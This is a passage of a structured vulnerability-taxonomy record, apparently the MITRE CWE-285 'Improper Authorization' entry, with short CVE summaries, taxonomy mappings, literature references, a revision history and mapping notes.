"Reference": "CVE-2008-6548"
},
{
"Description": "Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-2925",
"Reference": "CVE-2007-2925"
},
{
"Description": "Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-6679",
"Reference": "CVE-2006-6679"
},
{
"Description": "OS kernel does not check for a certain privilege before setting ACLs for files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-3623",
"Reference": "CVE-2005-3623"
},
{
"Description": "Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2801",
"Reference": "CVE-2005-2801"
},
{
"Description": "Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1155",
"Reference": "CVE-2001-1155"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Missing Access Control",
"MappingFit": null,
"TaxonomyName": "7 Pernicious Kingdoms"
},
{
"EntryID": "A10",
"EntryName": "Failure to Restrict URL Access",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2007"
},
{
"EntryID": "A2",
"EntryName": "Broken Access Control",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
},
{
"EntryID": "SFP35",
"EntryName": "Insecure resource access",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] |
[
"1",
"104",
"127",
"13",
"17",
"39",
"402",
"45",
"5",
"51",
"59",
"60",
"647",
"668",
"76",
"77",
"87"
] |
[
{
"Authors": [
"Katrina Tsipenyuk",
"Brian Chess",
"Gary McGraw"
],
"Edition": null,
"ExternalReferenceID": "REF-6",
"Publication": "NIST Workshop on Software Security Assurance Tools Techniques and Metrics",
"PublicationDay": "07",
"PublicationMonth": "11",
"PublicationYear": "2005",
"Publisher": "NIST",
"Section": null,
"Title": "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors",
"URL": "https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf",
"URLDate": null
},
{
"Authors": [
"NIST"
],
"Edition": null,
"ExternalReferenceID": "REF-229",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Role Based Access Control and Role Based Security",
"URL": "https://csrc.nist.gov/projects/role-based-access-control",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 4, \"Authorization\" Page 114; Chapter 6, \"Determining\n Appropriate Access Control\" Page 171",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Frank Kim"
],
"Edition": null,
"ExternalReferenceID": "REF-231",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "03",
"PublicationYear": "2010",
"Publisher": "SANS Software Security Institute",
"Section": null,
"Title": "Top 25 Series - Rank 5 - Improper Access Control (Authorization)",
"URL": "https://www.sans.org/blog/top-25-series-rank-5-improper-access-control-authorization/",
"URLDate": "2023-04-07"
},
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-45",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "OWASP Enterprise Security API (ESAPI) Project",
"URL": "http://www.owasp.org/index.php/ESAPI",
"URLDate": null
},
{
"Authors": [
"Rahul Bhattacharjee"
],
"Edition": null,
"ExternalReferenceID": "REF-233",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Authentication using JAAS",
"URL": "https://javaranch.com/journal/2008/04/authentication-using-JAAS.html",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 2, \"Common Vulnerabilities of Authorization\", Page 39",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 11, \"ACL Inheritance\", Page 649",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "7 Pernicious Kingdoms",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten 2004 mapping",
"ModificationDate": "2008-08-15",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships",
"ModificationDate": "2009-01-12",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Related_Attack_Patterns",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Type",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-04-05",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, References, Relationships",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2010-09-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Changed name and description; clarified difference between \"access control\" and \"authorization.\"",
"ModificationDate": "2011-03-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Background_Details, Demonstrative_Examples, Description, Name, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Observed_Examples, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2013-07-17",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2015-12-07",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-01-12",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Missing or Inconsistent Access Control",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Access Control (Authorization)",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Discouraged
|
CWE-285 is high-level and lower-level CWEs can frequently be used instead. It is a level-1 Class (i.e., a child of a Pillar).
|
Look at CWE-285's children and consider mapping to CWEs such as CWE-862: Missing Authorization, CWE-863: Incorrect Authorization, CWE-732: Incorrect Permission Assignment for Critical Resource, or others.
|
[
"Abstraction"
] |
[
{
"Comment": "Missing Authorization",
"CweID": "862"
},
{
"Comment": "Incorrect Authorization",
"CweID": "863"
},
{
"Comment": "Incorrect Permission Assignment for Critical Resource",
"CweID": "732"
}
] |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "\n\nAutomated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.\n\n\nGenerally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.\n",
"DetectionMethodID": "DM-6",
